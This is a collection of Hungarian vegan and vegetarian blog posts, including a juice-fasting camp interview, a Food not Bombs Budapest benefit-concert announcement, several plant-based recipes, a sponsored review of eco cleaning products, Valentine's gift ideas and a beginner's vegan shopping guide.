Mennyire szenvedtél meg az első léböjt táborod alkalmával? Ma már 26 éve vegetáriánus vagyok, tehát akkor is vegetáriánus voltam, de arra emlékszem, hogy nagyon szenvedtem a hátfájásomtól abban az időben. Masszírozás sem igazán segített. Szerencsére többen jöttek hátfájással az első táborra, és ahogy nekik, úgy nekem is elmúlt a hét nap alatt. Pedig akkor még béltisztító formulák nélkül csináltuk ezt a léböjt tábort. A végefelé volt egy kisebb rosszul létem, de nem viselt meg. A képen Német Antal, a tábor vezetője, épp fekete-levesét fogyasztja. Köztünk járt, velünk léböjtölt. Mindenkihez volt egy-egy kedves szava, nap mint nap érdeklődött hogy létünk felől. - Mi a jövőképed a táborra nézve? Tisztában vagyunk vele, hogy a tábor körülményei továbbra is fejlesztésre szorulnak. Ha minden igaz, jövőre már öt felújított szobánk lesz. Mindenki házakban van elszállásolva most is (kivéve a lakókocsisokat), de ezek régies vályog és téglaházak. Egy kivételével mindegyiknek van fürdőszobája. Szeretnénk legalább 10-14 felújított szobával működni. - Ha valaki azt mondaná, lehet három kívánságod és teljesül, mi lenne az a három? Elsődlegesen, hogy az épületeket fel tudjuk újítani, legalább 10 szoba legyen meg. Második, több munkatárssal tudjunk dolgozni és több szolgáltatást nyújtani. Harmadik pedig, hogy több vendég legyen, a fenntartás miatt is. Eddig a saját jövedelmemből is hozzá kellett tenni, hiszen az eddigi bevételek az évi költségeket, úgy mint épületadók, rezsiköltségek, takarítás, stb. még nem tudta lefedni egészében. De nagyon bízok abban, hogy a jó Isten ezután is megsegít. - Ha valaki támogatni, segíteni szeretné a tábort, milyen eszközökre van a legnagyobb szükség a további fejlődéshez? Ahogy említettem, tervben van több fürdőszobás szoba kialakítása, amihez mosdó, tusoló, csempe, wc és törölközőtartó kell. Tervben van, hogy térkővel a tábor további útvonalait, sétányait lefedjük. Az egyik épülethez lemeztetőre is szükség van. A szobákat szeretnénk egységes, egészséges ágyakkal, matracokkal, párnákkal és takarókkal felszerelni. Szeretnénk egy miniatür szanatóriumot kialakítani, amihez tégla, tető és nyílászárók is szükségesek lennének. Ha az épületek szobái rendben vannak, radiátorokkal és központi fűtéssel szeretnénk őket őszi és tavaszi használatra is felkészíteni, de nyilván ezt megelőzően még sok lépés áll előttünk. Szeretnénk egy kisebb autóba (pl. Suzuki) is beruházni, megkönnyítve ezzel a beszerzéshez szükséges utak üzemanyag és fenntartási költségeit, mert jelenleg egy öreg (több, mint 10 éves) furgon áll minden út rendelkezésére. (A táborról bővebb felvilágosítást nemeta@tippnet.rs e-mail cimen kaphatunk.) Jelenleg minden adománynak örülünk, hogy az egyszerű körülményeinket még jobbá tegyük. Egyszerűek a körülmények, de annál maximálisabb a levekben az ellátás és bővölködik a szeretetben.
Louder than Bombs - nagyot fog szólni a Food not Bombs Budapest támogatói koncertje
Szeptember 7-én és 8-án az Aurórában (Auróra utca 11.) megrendezésre kerül a Food not Bombs Budapest éves támogató koncertje. A magyarországi punk/hardcore közösség különböző zenekarai fognak játszani, hogy zenéjükkel ők is beleadjanak a közös üstbe. Az FNB Budapest aktivistái pedig isteni vegán burgerekkel és egyéb finomságokkal készülnek a hétvégére. A Food not Bombs Budapestről: Az FNB Budapest aktivistái hétről hétre összegyűjtik a kidobásra szánt zöldségeket és gyümölcsöket Budapest két nagyobb piacáról és vasárnaponként több fogásos meleg ételt főznek belőle rászorulóknak, amit aztán aznap délután ki is osztanak a Boráros tér és Blaha vonzáskörzetében. Tevékenységükkel felhívják a figyelmet az ételpazarlás, a hajléktalanság és lakásszegénység ellen foglalnak állást és népszerűsítik a húsmentes étrendet. Természetesen a rászorulóknak kiosztott meleg étel sem tartalmaz húst vagy egyéb állati eredetű terméket. További információkat a Food not Bombs Budapest Facebook oldalán találhatsz: https://www.facebook.com/foodnotbombsbudapest/ Az eseményről: A főzéshez azonban nem elég csak az alapanyag. Az egyéb ehhez szükséges dolgok, például gázpalack, fűszerek, hozzávalók, olaj és alkalmanként műanyag dobozok pénzbe kerülnek. Habár sok ember adományoz fűszerekkel, tésztákkal, olajjal és dobozzal, továbbra is szükségünk van közösségi támogatásra, hogy minden évben fenntartható legyen a projekt, így ezért gyűjt pénzt egy támogatói buli keretein belül az FNB Budapest. Az ,,ételosztás a koncerten sem fog elmaradni. Vegán burgerekkel és egyéb finomságokkal készülnek az FNB-sek, amik fogyasztásával szintén támogatod a munkájukat, illetve kaphatóak lesznek FNB logós vászontáskák és pólók is. Szeptember 7-én és 8-án az Aurórában, Budapest egyik legizgalmasabb kulturális-közösségi helyén lesz megtartva az esemény - ahol egyébként az FNB is fészkel. Mindkét nap hét órakor kezdődik a buli. A belépő minimálisan 1500 forint, amivel a csoport jövőjét támogatod. A pénteken fellépő zenekarok listája: Bad Habit Böiler Demoscene Gear Gipsy SS Kristályvonat PFA A szombaton fellépő zenekarok listája: Contra Hanoi Herion Tango Underground Tetrafobia Amything The Snobs Tisztán a cél felé Touch A szervezők ez úton is kérik a résztvevőket, hogy az utcán ne hangoskodjanak, különösen hazafele távozáskor és taxit a Népszínház utcába hívjanak, hogy az Auróra és az ott megrendezett közösségi rendezvények továbbra is fennmaradhassanak, és a hely környékén lakókat ne zavarjuk a pihenésben. Az első nap Facebook eseménye: https://www.facebook.com/events/222126945038325/ A második nap Facebook eseménye: https://www.facebook.com/events/436955723428319/ Köszönjük, ha eljössz és támogatod a csoport fennmaradását! A zenekarokról: Negyedik éve fog össze a magyarországi punk/hardcore színtér, Debrecentől Szombathelyig az FNB Budapest támogatása érdekében. Jó látni, hogy a punk/hardcore stíluson belül is azért különböző irányvonalat/mentalitást képviselő bandák közös erővel támogatják a jó ügyet. A zenekarok között fellép többek között az itthoni Oi!/Streetpunk színtér régi zászlóshajója, a Böiler. Az egri hardcore színtér két alap zenekara, a Tisztán a cél felé és a Tango Underground. Ha nem szereted annyira a keményebb zenét, akkor is érdemes eljönnöd, mert fellép a jazz/funk stílusban utazó Amything és a ska-ban utazó Bad Habit is! Gyertek! The post Louder than Bombs - nagyot fog szólni a Food not Bombs Budapest támogatói koncertje appeared first on VegaNinja.
Kerestük, de alig találtuk: hová tűnt a paradicsom íze?
A paradicsom igazi ajándék nyáron, ha finom, lédús és zamatos. Nemcsak a magyar konyha egyik kedvenc alapanyaga, hanem a mediterrán receptek bejáratott szereplője is. A paradicsom értékes vitaminokkal és ásványi anyagokkal látja el a szervezetünket, ezért a minél több, annál jobb elve alapján körbejártuk az üzletláncokat és néhány véletlenszerűen kiválasztott zöldségest, hogy megkóstoljuk a náluk kapható paradicsomokat. Tizenháromféle fürtöst zsűriztünk, az eredmény pedig majdhogynem siralmas lett. Versenyen kívül megkóstoltunk pár nem fürtöst is, de többnyire újabb csalódások értek.
Minden sarkon kapni: csonterősítő és fogyasztó csodazöldség
A Földközi-tenger vidékéről és a Közel-Keletről származó finomságot arrafelé garbanzo bab néven is ismerik. Az olasz, a görög, az indiai, az arab, a spanyol és a portugál konyha egyik legkedveltebb alapanyaga, de Magyarországon is egyre többen szeretik. Összegyűjtöttünk néhány érvet, hogy miért érdemes belőle enni!
Mediterrán vegán tökmagkrém
2018. június 17. Élj harmóniában
Itt a nyár és ilyenkor a férjem gyakran megkívánja, az amolyan hideg vacsorát. Mi az esetek nagy részében frissen főtt, meleg ételt eszünk, akár naponta háromszor főzünk, de nyáron ő sokszor vágyik szendvicsekre - persze a hozzávalókat is általában frissen készítjük. Ma amikor hazaérkeztünk délután, sütöttem neki frissen kis rozs zsemléket. Nagyon szereti a férjem a vajat, de most az indiai ájurvédikus orvosunk javaslatára a vajat kerülnie kell 2 hónapig, így gyorsan elgondolkodtam mit készítsek neki a zsemlékhez. Elsőre napraforgókrémbe gondolkodtam van egy jó kis magyaros jellegű receptem, amit szoktam neki csinálni, de amikor felmértem a készleteket kiderült, hogy napraforgómagból most csak kb. 6 dkg van itthon. Ellenben találtam egy csomag Rapuntzel bio tökmagot (200 g) aminek nagyon megörültem. Így született meg ez a mediterrán szendvicskrém:) Mediterrán vegán tökmagkrém Hozzávalók: 200 g tökmag 5 ek olívaolaj 8 ek aszalt paradicsom apróra vágva 1/4 tk. aszafoetida (hing) só bors Vegyszermentes (bio) alapanyagokat használj! A tökmagot pirítsd meg egy edényben, majd hagyd egy picit hűlni - de maradjon még meleg. Tedd hozzá az aszalt paradicsomot, asafoetidát, sót, borsot és az egészet öntsd be egy aprítógépbe. Majd kezd el a géppel összedolgozni. Amikor már elkezdett szépen, apró részekre jönni a tökmag, öntsd hozzá az olívaolajat és a géppel addig aprítsd, amíg krémes állagú nem lesz. Tálalhatod friss salátával és különböző kenyér és zsemlefélékkel (recepteket találsz a blogon), chapatival (receptet itt olvashatod).
Cudy-future: természetesen tiszta...ajánló és nyereményjáték
2018. június 4. Mindennapi ételeink
Régóta fontos számunkra, hogy környezetbarát mosó-és tisztítószereket használjunk otthonunkban. Emellett mindig a magyar termékeket részesítettük előnyben, nemcsak élelmiszereknél, hanem minden másban is, amiben csak lehetett. Így már első gyermekünk, Fanni születésénél megörültünk a Cudy Future nevű cég termékeinek. Talán egy bio nagykerben vettünk először általuk fejlesztett, Wash Taps névre hallgató folyékony mosószert. Azóta már postán rendeljük tőlük a termékeket (mindig gyorsan, pontosan és precíz csomagolásban érkeznek azok.) Második gyermekünk, Gergő születése után még inkább hangsúlyossá vált számunkra ez a téma, mert ő érzékeny bőrű. Sokat utazunk, és pl táborban vagy nagyszülőknél piros kiütések jelentkeztek nála, amikor nem tettem alá saját lepedőt vagy nem saját takaróval takartam. Érzékeny bőrű. Most ajándékokat kaptunk Cudy Future-től, aminek nagyon megörültünk. Termékeiket több csoportra tudnám osztani: - Wash Taps folyékony és por mosószerek, színes és fehér ruhákhoz Ezeket a termékeket évek óta használjuk, nagyon gazdaságosak és foszfátmentesek, klórmentesek, parabénmentesek, állatkísérlet mentesek, pálmaolaj mentesek, vegánok, mindegyik természetes összetevőkből készült (kukoricaolaj, kókuszolaj). Biológiailag jól lebomló felületaktív anyagokat és kizárólag élelmiszeripari színezőanyagot tartalmaznak. Az illatuk finom, így öblítő nélkül is finom illatosaklesznek a ruhák. - Soft Breeze öblítők A 7 fajta illatban vásárolható öblítők természetes növényi összetevőkből készülnek (kukoricaolaj, kókuszolaj). Tartalmaznak az ,,ECOLABEL minősítésnek megfelelő felületaktív anyagot és élelmiszeripari színezőanyagot. A textilöblítők válogatott alapanyagokból készülnek. A Soft Breeze öblítőkkel mosott ruhák különleges, bársonyosan puha tapintásúak, üdítően frissek lesznek, az illatukat rendkívül hosszú időn át megőrzik. Kapható 1 l és 5 l-es kiszerelésben. Tekintettel arra, hogy koncentrátumok,, 1 liter öblítőből 5 liter készíthető. Nagyon gazdaságosak, a piacon megtalálható azonos minőségű termékek árának a töredékéért vásárolhatók meg, ez teszi rendkívül vonzóvá. - Csepke baby termékek Ebben a termékcsaládban hipoallergén mosógélek, öblítők, cumisüveg mosó és folttisztító található. Mindegyik remekül tisztít és szintén a termékek foszfátmentes, klórmentes, parabénmentes, állatkísérlet mentes, pálmaolaj mentes, vegán, természetes összetevőkből készült (kukoricaolaj, kókuszolaj). Biológiailag jól lebomló felületaktív anyagokat és kizárólag élelmiszeripari színezőanyagot tartalmaz. Nem tartalmaz maró irritáló anyagot, nem okoz bőrkiütést, viszketést, allergiát. Alacsony hőfokon is eltávolítja a foltokat. Könnyen öblíthető, nem marad tisztítószer a ruhában. Kímélő a textíliához. Bambusz pelenkák mosásához is megfelelő. Biztonságos használat már újszülött kortól. - Cudy tisztítószerek Itt tisztítószerek, pl vízkőoldó , mosogatószer, mosogatógép öblítő található, melyek szintén foszfátmentes, klórmentes, parabénmentes, állatkísérlet mentes, pálmaolaj mentes, vegán, természetes összetevőkből készült (kukoricaolaj, kókuszolaj) termékek. Biológiailag jól lebomló felületaktív anyagokat és kizárólag élelmiszeripari színezőanyagot tartalmaznak. A vízkőoldót használtuk eddig, a legerősebb vízkövet is remekül leszedte, Fanni lányunk nagy csodálkozására. Fannival mindig együtt takarítunk és tapasztalja, hogy a vízkövet nehéz leszedni. Ezért csodálkozott most, amikor ezt a terméket kipróbáltuk. - Soft Power mosogatószerek A 6 féle illatban kapható mosogatószerek nagy kedvenceink. Nemcsak a különleges illatuk miatt, hanem szintén nagyon gazdaságosak, hiszen ötszörös hígításban kell alkalmazni, bőrvédő szőlőmagolaj komponenseket tartalmaznak, ezáltal védi k a kezünket a kiszáradástól. A szőlőmagolaj kivonatnak köszönhetően ápolja, regenerálja a bőrt. A termékek vízlágyítót tartalmaznak, így magas összkeménységű és vastartalmú vízben is hatékonyan használhatók. Kaphatók 1 és 5 literes kiszerelésben. - Wolt foltisztítók Egyik nagy kedvencem, por alapú folttisztító, amelyet akár a mosóporhoz adagolva, akár előáztatásra használhatunk. A termék adagolása egyszerű és gazdaságos, egy evőkanállal a mosóporhoz adagolva megnöveli a mosópor mosási hatékonyságát. Sok mosóport spórolhatunk meg, ha a nagyon szennyezett ruhát előáztatjuk. Fanni ruháiból remekül hozza ki a cseresznyét, meggyet, paradicsomot. Reméljük, hogy kedvet csináltunk a termékekhez. A cég nagyon vevőbarát, gyorsak, pontosak. Ezúton is köszönjük a termékeket! Akinek van facebook profilja, jöjjön a Mindennapi ételeink @magdireceptek oldalra és nyerje meg a cég felajánlását: 5000 Ft értékű szabadon választható terméket!
Szejtánnal töltött, bundázott sós palacsinta
2018. április 8. Mindennapi ételeink
A palacsinta az az étel számomra, mint Gomboc Arturnak a csokoládé. Bármikor, bárhol, bármilyet (bizonyos kereteken belül bármilyet :-). Bármennyit nem. Ez a sós verzió húsvétkor készült, amikor volt időnk Fannival pepecselni, mert Gergőnket férjem kicsit lefoglalta addig. Hozzávalók: 0,5 liter buborékos víz kb 20 ek. liszt - fele teljes őrlésű, fele finomliszt 4 ek. napraforgó olaj 1 kisebb, apróra vágott lilahagyma 1 gerezd fokhagyma 0,5 apróra reszelt salátacukkini só, vegeta, borspótló fűszerkeverék - ízlés szerint -- 1 fej lilahagyma 1 db (30 dkg) füstölt, magyaros gabonagömböc 2 dl szójajoghurt kb 10 dkg növényi sajt -- tönkölyliszt, csicseriborsóliszt, víz, zsemlemorzsa (panír) Elkészítés: A palacsintatésztához mindent egy tálba öntünk (adagolunk), majd botmixerrel összedolgozzuk, ehhez reszeljük a cukkinit, fokhagymát, apróra vágjuk a hagymát és beleforgatjuk a tésztába. Egyenként kisütjük. Miközben sülnek a palacsinták, lereszeljük a gabonagömböcöt, felvágjuk a hagymát. A kisült palacsintákat megkenjük a szójaszósszal, rászórjuk a reszelt gabonagömböcöt, lilahagymát, sajttal megszórjuk és jobb, majd bal oldalt behajtjuk és úgy felcsavarjuk. A panírhoz egy tálba öntjük a tönkölylisztet, másikba a csicseriliszttel összekevert vizet, majd legvégül a morzsát. Ezt követően bepanírozzuk a palacsintákat és kókuszolajban kisütjük. (akár sütőben, akár teflonban). Salátával, tartárral fogyasztjuk.
Vegán zserbó
Olykor-olykor megfogalmazódik bennem egy vágy, elkészíteni egy adott ételt vagy süteményt. Egyes esetekben jól ismert és általam vagy férjem által kedvelt étel vegán verziója a terv, más esetekben csak ötlet, hogy a különböző alapanyagok hogyan állnak össze egy komplett étellé. A zserbó is régebbi vágyam volt. Vegán zserbó. Ugyan az interneten keringenek különböző receptek, de nem nyerte el a tetszésemet egyik sem olyan mértékben, hogy azt mondjam, "igen, ez az! megcsinálom!" Városunkba, utánunk valamivel később, leköltözött Londonból egy nagykőrősi házaspár, nagyjából egyidősek vagyunk. Emlékszem, az első Londonban eltöltött karácsony alkalmával a feleség készített zserbót, majd amikor már itt laktak, akkor itt is. Így kezdett el bennem is mozogni a vágy, készítenék és ennék zserbót vegán módra. Nyáron, amikor Magyarországon voltunk, diót és baracklekvárt is kaptunk, tehát az alapanyagok adottak voltak. Félre is tettem mindkettőből annyit, hogy zserbót tudjak készíteni. Amikor már készítettem, rájöttem, hogy ennek bátrabban neki kezdhettem volna, mert nekem elég egyszerű. Bár sok hozzávalót tartalmaz, mégsem olyan nehéz elkészíteni. Legyen húsvét vagy karácsony, vendégvárás vagy vendégségbe készülődés, remek desszert a vegán zserbó. Miután Gerbeud feleségül vette a genfi csokoládégyáros lányát, Ramseyer Esztert, 1884-ben, 30 évesen, Magyarországra költözött, majd 1885-ben átvette Kugler Henrik cukrászdáját a budapesti Gizella (ma Vörösmarty) téren, berendezte a városligeti Királycsarnokot, feltalálta a macskanyelvet, a csokoládés drazsét, többszáz-féle bonbont exportált Európába, Dél-Amerikába, még a török szultán háremébe is szállított, folyamatosan dolgozott. Produktív életet élt. A kérdés azonban felvetődik bennem is, mi köze Gerbaud-nak ehhez a finom süteményhez? Valóban az ő kezének a produktuma? Evett - e életében zserbó szeletet Emil Gerbaud? Állítólag a Gerbeaud-házban 1948-tól működő Vörösmarty Cukrászda találmánya volt a híressé vált dió és lekvár kompozíció, tetején csokimázzal, azaz a >>zserbó-szelet
Csőben sült édesburgonya
Amellett, hogy C-vitamin és béta karotin forrás, E-vitamint is tartalmaz az édesburgonya, más néven batáta. Magyar és angol nyelvű oldalakon, valamint egy angol nyelvű könyvben próbáltam utánanézni mennyi E-vitamint tartalmaz 100 gram édesburgonya, és meglehetősen változatos számokat találtam. A könyv szerint 130 gram sült édesburgonya 7,7 mg E-vitamint, jobban mondva Tocopherol-t tartalmaz. (Kristen Hartvig, The healthy diet calorie counter, 2004, 126.o.). A könyv leirja, hogy az E-vitamin is egy fő antioxidáns, akárcsak a C-vitamin. Sejtmembrán védő szerepe van. Mivel minden szervünk sejtekből épül fel, ezért igen fontos, hogy legyen megfelelő mennyiségű E-vitamin mindennapi táplálékainkban. Külön kiemelendő, hogy csökkenti a szívbetegség, rák és cukorbetegség kockázatát. Egyes tapasztalatok szerint rendszeres E-vitamin szedés során cukorbetegek inzulinadagja csökkent. Az E-vitamin a hőt lényegesen jobban bírja, mint a C-vitamin, 170 fokon pusztul el ugyanis. A következő ételnél ha ügyelünk a főzési/sütési hőmérsékletre, akkor ételünkben marad E-vitamin. Ezzel támogatjuk sejtjeinket, segítjük őket a szabadgyökök elleni védekezésben. A recept Hozzávalók: - 1,5 kg édesburgonya (ebben a receptben vegyesen lila és sárga batáta) - 1,5 csomag tofu - szójatej - 2 ek sörélesztő pehely - só - 1-2 gerezd fokhagyma - kurkuma - kókuszzsír Elkészítés: A megmosott batátákat héjastól vízben megfőzzük, de ne túl puhára. Közben felszeleteljük a tofut, és némi szójatejjel és sörélsztő pehellyel összeturmixoljuk. Sűrűbb szószt kapunk, olyasmit mint egy folyósabb joghurt. Sóval, 1-2 gerezd fokhagymával és kurkumával ízesítjük ezt a szószt a turmixolás során. A megfőtt batátákat hideg vizzel átzuhanyoztatjuk, majd ha picit lehűltek, megpucoljuk őket, és felkarikázzuk. A tűzálló tálat kókuszzsírral kikenjük. Először egy sor felkarikázott batátát teszünk, megsózzuk, majd a tofus szósz egy részével beterítjük. Következő sor felkarikázott batátát megsózzuk és arra is öntünk a tofus szószból. Ezt addig csináljuk, míg az édesburgonya és a szósz el nem fogy. Ezután mehet a sütőbe, ahol pirulásig sütjük, maximum 150-160 fokon.
csokipudingos-túrós rétes
2018. február 22. Beautilicious
Hogy is képzelhetnénk el a nassolást rétes nélkül? Sehogy! Még a diéta alatt sem maradhat ki egy igazi magyar étrendjéből a rétes. Klasszikus, és örök kedvenc :) Hozzávalók - 100gr barnarizs liszt - 150ml szénsavas víz - egy csipet só - 3 tojás - 200gr túró - 40gr kakaópor - 40+40gr édesítőszer - 200ml folyadék - 30gr kókuszreszelék - 1 citrom leve Így készítsd - A tojásfehérjét szénsavas vízzel, csipet sóval, és a liszttel keverjük össze. Palacsintatészta állagot fogunk kapni. - Ezt öntsük tepsibe, és süssük 10percig - A töltelékhez készítsünk csokipudingot a megszokott módon ( felfőzzük a folyadékkal a tojássárgáját, édesítőt, kakaóport) - A túrós töltelékhez a túrót kikeverjük édesítőszerrel, és citromlével. An kókuszreszeléket is tettem bele, mert imádom :D - Megtöltjük a tésztát, és feltekerjük, majd sütjük 30percig
Valentin napi ajándékötletek
Nyakunkon a szerett-utált Valentin-nap. Ha azok közé tartozol, aki ilyenkor szereti megajándékozni kedvesét, több ötletünk is van. Ha nem, akkor is olvass tovább. Süss vagy vegyél neki sütit! Vegán Bűbáj vegán sütik Sztupák Szonjától – https://www.facebook.com/pg/sztupakszonja/ Egy krémes, habos vagy éppen gyümölcsös vegán sütinek szinte mindenki örül. Legyen akár nyers vagy hagyományos, ide kattintva találsz választási lehetőséget! Ha magad sütnél inkább valami finomat, akkor nézz szét ZöldElla fantasztikus receptjei között, kattints ide! Ha tudsz angolul, akkor nézd meg ezt a red velvet cake pop receptet is, nagyon látványos és biztos finom is! Magyar fordításban valahogy így hangozna: vörös bársony pálcikás süti. Különlegessége azon kívül, hogy pálcikán van, az az, hogy céklapürével színezik a tésztáját, ettől vörös. Vegán kiegészítők a VegaNinja válogatásában Karórák egy etikus, vegán cégtől: VOTCH – VegaNinja webshop A képen látható vegán karórák 53 színkombinációban kaphatóak a VegaNinja vegán webshopban. Nőies és férfias darabok egyaránt megtalálhatóak köztük, mindegyiket a brit VOTCH cég gyártja, amit Laura Stageman vezet, szigorú vegán etikai elvek mentén. Nyereségük 10%-át mindig egy állatvédelmi/vegán alapítványnak vagy egyesületnek adják, 3 havonta másiknak. Corkor vegán parafa övek és pénztárcák De találsz még a webshopban környezetbarát és vegán öveket, pénztárcákat a Corkortól. PETA által elfogadott vegán termékek, amik gyártásakor a toxikus anyag kibocsájtásra és a méltányos munkakörülményekre is nagy hangsúlyt fektettek. Vegán könyvek Vegán receptkönyvek a VegaNinja webshopban Akár kezdő vegánok vagytok, akár gyakorlott tofuhuszárok, az általunk összeválogatott vegán receptkönyvek hasznos ajándékok lehetnek mindenkinek. Vannak könyvek Nagy Zitától, aki a Zizi kalandjai blog szerzője, Dr Andrási Nórától, aki a Mindenmentes könyvek és blog írója, és persze a fantasztikus Steiner Kristóftól is. De nem csak receptekből áll a repertoár: Bonifert Anna nagy sikerű könyvei is hasznos olvasmányok bárkinek. >> Nézd meg a könyveket! Vegán feliratos pólók, táskák, mobiltokok… Vegán feliratos pólók, táskák, kiegészítők a Society6-ről Nézz szét a több száz vegán feliratos ajándéktárgy között a Society6-en, és támogasd a művészeket vásárlásoddal! Magyarországra is szállítanak, a szállítási díj sem olyan vészes. Nem csak pólókat lehet megvenni ezekkel a mintákkal, hanem hátizsákok, minőségi leggingsek, párnák, de még zuhanyfüggönyök is vannak vegán mintával. Akár a ruhatáradba, akár az otthonodba szeretnél csempészni egy kis vegán üzenetet, itt találsz hozzá mutatós megoldásokat mindenféle stílusban. Kattints ide a mintákért! Kövesd a Vegán Póló és a Best Vegan Apparel oldalakat az akciókért! Vegán sminkecsetek Vegán sminkecsetkészlet – ebay Azoknak, akik szeretnek sminkelni, klassz ajándék lehet egy teljesen vegán sminkecsetkészlet, mivel a hagyományos ecsetek gyakran állatszőrből készülnek. Ez a készlet fa nyelű, és újrahasznosított fémből készült a szőröket összefogó pánt. Ingyenes szállítással. Kattints ide a részletekért! Szakállasoknak… Vegán szakállolaj – ebay Favágóknak és más, szakállas entitásoknak jó ötlet lehet a szakállolaj. Természetes összetevőkkel és választott illattal, ingyenes szállítással innen. Vegán parfüm Pacifica vegán, cruelty free parfüm Klasszikus ajándék vegán, cruelty free kivitelben. Ez a fajta a képen kb. 9 000 Ft-ba kerül szállítással együtt, de a krémparfüm verziói jelentősen olcsóbbak. Megnézem >> Más vegán parfümök >> DIY vegán képeslapok Töltsd le és nyomtasd a cuki vegán témájú, Valentin-napi képeslapjainkat ingyen itt: Kattints a képeslapokért! Ha nem vagy az ajándékozás híve… Adj élményt! Vegán főzőtanfolyamok a Kertkonyhával Jelentkezzetek együtt a Kertkonyha vegán főzőtanfolyamainak egyikére! Állandó kedvezméyként a VEGANINJA kuponkóddal 500 Ft kedvezménnyel kapod meg a részvételi lehetőséget. Kattints ide a részletekért! Párkereső szingliknek… Ha szingli vagy, és szeretnél ezen változtatni, akkor kipróbálhatod az új, a magyar vegetáriánus és vegán társkeresőt, a VegaRandit. Ha pedig valami ingyenes megoldással próbálkoznál, a Facebookon három csoportban is nézelődhetsz: - Vegetáriánus és vegán szinglik társkeresője - VELOVI * Vegan Love Vibes - Vegán Társkereső Ha pedig imádsz szingli lenni… …kényeztesd magad pihenéssel, vegán habos sütivel, vegán habos fürdővel, egy erdei kocogással, ajándékkal, vagy bármivel, ami jólesik. A leghosszabb kapcsolatunk saját magunkkal van, így az első és legfontosabb szeretet, amit ápolnunk kell, az a saját magunk iránt érzett szeretet! The post Valentin napi ajándékötletek appeared first on VegaNinja.
Bevásárlási gyorstalpaló fehéröves növényevőknek
Személyes tapasztalatom, hogy az emberiség egy bizonyos rétegét nem az riasztja el a veganizmustól, hogy le kell mondania az bölényzsírban párolt szalontüdőről vagy a borznyesedékből készült kenőmájasról. És nem is az, hogy onnantól fogva nem imitálhat nuncsakuzást egy pár, összekötözött juhbeles virslivel. (Ki csinálta ezt rajtam kívül gyerekkorában a nindzsafilmek hatására, kezet fel! Őőő... senki? Sebaj, már akkor sem szerettem belesimulni a konformista tömegbe.) Hanem sokkal inkább a tanácstalanság, hogy mégis, mit és honnan szerezzen be, és mégis, mit reggelizzen a mindennapokban májkrémes kifli és parizer helyett. (Netán főzési ismeretei Maugliéval és Tarzanéval vetekednek.) Nos, ezúttal nekik szeretnék egy tudálékos gyorstalpalóval kedveskedni azon "spéci" élelmiszerekről, alapanyagokról, melyek egy vegán - jelen esetben pl. ezen sorok írójának - konyhájában többnyire megtalálhatóak. Humusz, padlizsánkrém, ajvár Mindhárom házilag is könnyen előállítható, de pl. a G-Roby és a Spar boltokban is többnyire fellelhetőek. Ez, ez és ez garantáltan nem csehszlovák minőséget képvisel. Búzasikér Nem, még egyszer nem írom le, mi az a szejtán. Akkor sem, ha izzó vasszegeket kalapálnak a fülembe egy konyhásnéni klumpájával! A Google térhódításának korában mindenki elégedjen meg azzal, hogy ez képezi az alapanyagát. És kb. minden bioboltban fellelhető. Gluténérzékenyek kerüljék, mindenki más fogyaszthatja. Nem mellesleg több mint költséghatékony, az 500g-os kiadásból kb. 4-5 alkalomra elég szejtánt lehet összedobni. Csicseriborsó Ezerféleképpen felhasználható cucc csúcsmagas fehérjetartalommal. Ne szórjuk ki a lovettát a 300 ft feletti konzervekre, a 200 ft-os Gianna márkajelzésű legalább annyira frankó, mint a 800g-os kiadvány az Aldiban. Natúr szójatej, szójajoghurt Jelenleg is a gyomromból kitüremkedő harmadik kezemmel tekerem azt a szirénát, mely a génmódosítás okozta pánikot hivatott zenei aláfestésben részesíteni. Most, hogy a szójafóbiások magukra zárták az atombunker ajtaját, elmondanám, hogy a reggeli kávéhoz kb. 5 éve, majdnem csak napi jelleggel fogyasztom, és semminemű káros hatását nem tapasztalom, sőt. A The Bridge, illetve az Alpro márkájúak kiválóak, az Aldiban fellelhető variáció viszont olyan ízű, mint fertőzött bányató, melybe depressziós görények fojtották bele magukat. Hátulütőjük, hogy nem olcsók, de nem kell mindig ilyet vedelni. Szójavirsli A virsli nevezetű egzotikumról most nincs türelmem bővebben értekezni, keressen rá, akit érdekel, hogy fest ez a kulináris különlegesség. Sajna a külföldi kiadásúak 700 ft felett vannak, de pl. a VegaBond nevezetű 350 körül mozog. Tofu Lásd a szójatejnél írottakat. A magyar tulajdonú, 1998-as időcsapdában rekedt áruházláncok kivételével kb. mindenhol megtalálható. Kifejezetten tré minőségűvel nem találkoztam, kb. mindegyiket tudom ajánlani.
Búzasikér
A búzasikér a búza kivont fehérjetartalma, ebből készül a szejtán, másik nevén búzahús. Húsételek helyettesítésére kiváló választás. B-vitaminokat, niacint, E-vitamint, rezet, vasat, mangánt, cinket, magnéziumot, kalciumot, foszfort és szelént tartalmaz. Szejtán alaprecept: a búzasikérport alaposan befűszerezzük, besózzuk még szárazon, és jól elkeverjük. Magyaros ízvilághoz borsot, köményt, pirospaprikát használjunk, de ez szabadon variálható. Keverhetünk hozzá lisztet vagy sütőport, hogy ropogósabb vagy szivacsosabb állagot érjünk el. Ezután vizet adunk hozzá, 100 gramm sikérhez kevesebb, mint 2 dl víz szükséges. Ekkor összeáll egy gumis kis gombóccá, melyet félökölnyi labdákra kell szedni, és 10 percre félrerakni. Közben tegyünk a tűzre egy jól befűszerezett főzővizet, és ha forr, tegyük bele a labdácskákat. Ha feljönnek a víz felszínére, még 5 percig főzzük őket. Ezután úgy használható, mint a hús, szeletelhető, darálható, pácolható, süthető, vagy főzhető. Búzasikér – szejtán receptek The post Búzasikér appeared first on VegaNinja.
mákos guba kocka
2017. december 30. Beautilicious
Igazi magyar klasszikus, és mindenki nagy kedvence a mákos guba. Te se maradj ki belőle, készítsük el egészségesen! Imádni fogod! hozzávalók - 150gr köles - 35gr mák - 40gr + 2ek édeszítőszer - 3 tojás - 1 citrom héja és leve - vaníliaaroma így készítsd - Főzd meg a kölest vaníliás vízben, vagy tejben ízlés szerint - A tojásokat válasszuk ketté - A sárgáját adjuk a köleshez - A fehérjét verjük habbá 2ek édesítővel - Adjuk a mákot,és az édesítőt a köleshez - Öntsük a masszát a tepsibe, majd Kanalazzuk rá a tojásfehérjét - Tegyük be 180fokon a sütőbe, míg aranybarna nem lesz a fehérjehab
Magyaros szendvicskrém
